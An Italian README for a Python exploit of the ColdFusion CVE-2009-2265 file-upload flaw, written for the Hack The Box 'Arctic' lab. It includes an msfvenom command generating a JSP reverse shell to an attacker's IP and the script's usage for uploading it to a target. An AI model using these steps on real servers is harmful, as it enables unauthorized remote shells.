
exploit ColdFusion basato su https://cvedetails.com/cve/CVE-2009-2265/
exploit per ColdFusion basato su https://cvedetails.com/cve/CVE-2009-2265/
La ragione principale per cui ho creato uno script Python per questa specifica CVE è che la versione Metasploit dello stesso exploit non funzionava per me quando ho provato a risolvere la macchina Arctic di HTB. Inoltre, è stato bello fare un po' di pratica con Python. Tuttavia, esiste un'altra versione Python dello stesso exploit in circolazione, originariamente creata da Alexander Reid, se preferisci usare la sua versione.
L'uso è abbastanza semplice:
Assicurati di avere un file payload creato
ad es. usando msfvenom:
msfvenom -p java/jsp_shell_reverse_tcp -f raw LHOST=<yourip> LPORT=<yourport> -o shell.jsp
uso: python3 2265.py [-h] -t TARGET [-p PORT] [-f FILEPATH] [-b BASEPATH]
usage: 2265.py [-h] -t TARGET [-p PORT] [-f FILEPATH] [-b BASEPATH]
argomenti opzionali:
-h, --help show this help message and exit
-t TARGET target ip
-p PORT target port
-f FILEPATH path of file with shellcode to upload
-b BASEPATH coldfusion basepath